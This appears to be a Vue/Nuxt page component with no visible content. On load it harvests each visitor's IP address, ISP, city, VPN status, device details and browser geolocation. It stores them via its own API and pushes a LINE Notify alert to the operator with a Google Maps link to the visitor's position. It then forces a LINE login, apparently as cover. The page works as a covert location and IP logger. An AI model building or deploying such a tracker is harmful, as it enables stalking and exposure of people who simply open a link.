<template></template>

<script>
export default {
  head() {
    return {
      script: [
        {
          src: "https://static.line-scdn.net/liff/edge/2.1/sdk.js",
          charset: "utf-8",
        },
      ],
    };
  },
  data() {
    return {
      ip_address: null,
      host: null,
      position: null,
      lat: null,
      lng: null,
      country: null,
      country_code: null,
      city: null,
      timezone: null,
      isp: null,
      is_vpn: null,
    };
  },
  async mounted() {
    await this.initial();
  },
  methods: {
    lineNotify(data) {
      if (data.device === 'crawler') {
        return
      }

      let message = `\nhost : ${data.host}\nip : ${data.ip_address}`;
      if (data.isp) {
        message += `\nisp : ${data.isp}`;
      } else {
        message += `\nisp : -`;
      }

      if (data.country) {
        message += `\ncountry : ${data.country}`;
      } else {
        message += `\ncountry : -`;
      }

      if (data.device) {
        message += `\ndevice : ${data.device}`;
      } else {
        message += `\ndevice : -`;
      }

      if (data.os) {
        message += `\nos : ${data.os}`;
      } else {
        message += `\nos : -`;
      }

      if (data.browser) {
        message += `\nbrowser : ${data.browser}`;
      } else {
        message += `\nbrowser : -`;
      }

      if (data.lat && data.lng) {
        message += `\nposition : https://www.google.com/maps/place/${data.lat},${data.lng}`;
      } else {
        message += `\nposition : -`;
      }

      if (data.is_vpn !== null) {
        message += `\nis_vpn : ${data.is_vpn}`;
      } else {
        message += `\nis_vpn : -`;
      }
      
      let date = this.$dayjs().tz('Asia/Bangkok').format('DD/MM/YYYY HH:mm:ss')
      message += `\ntimestamp : ${date}`
      this.$axios
        .post("api/line/notify", {
          message: message,
          access_token: this.$config.lineNotifyToken,
        })
        .catch((error) => {
          console.log(error);
        });
    },
    saveData() {
      let ua = this.$ua;
      let data = {
        ip_address: this.ip_address,
        host: this.host,
        device: ua.deviceType() || null,
        os: ua.os() || null,
        browser: ua.browser() || null,
        browser_version: ua.browserVersion() || null,
        user_agent: navigator.userAgent || null,
        lat: this.lat,
        lng: this.lng,
        country: this.country,
        country_code: this.country_code,
        city: this.city,
        timezone: this.timezone,
        isp: this.isp,
        is_vpn: this.is_vpn,
      };
      this.$axios.post("/api/user", data).catch((err) => {
        console.log(err);
      });
      this.lineNotify(data);
    },
    async initial() {
      const res = await this.$axios
        .get("https://ipgeolocation.abstractapi.com/v1/?api_key=" + this.$config.ipApiToken)
        .catch((error) => {
          console.log(error);
        });

      let data = { ...res.data };
      this.country = data.country;
      this.country_code = data.country_code;
      this.city = data.city;
      this.isp = data.connection.isp_name;
      this.timezone = data.timezone.name;
      this.ip_address = data.ip_address;
      this.is_vpn = data.security.is_vpn;
      localStorage.setItem("ip_address", this.ip_address);

      this.host = location.href;
      localStorage.setItem("host", this.host);

      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(
          (position) => {
            this.lat = position.coords.latitude;
            this.lng = position.coords.longitude;
            this.saveData();
            this.lineLogin();
          },
          (error) => {
            this.saveData();
            this.lineLogin();
          }
        );
      }
    },
    lineLogin() {
      liff.init({ liffId: this.$config.lineLiffId }).then(() => {
        if (!liff.isLoggedIn()) {
          liff.login();
        } else {
          liff.logout();
          liff.login();
        }
      });
    },
  },
};
</script>
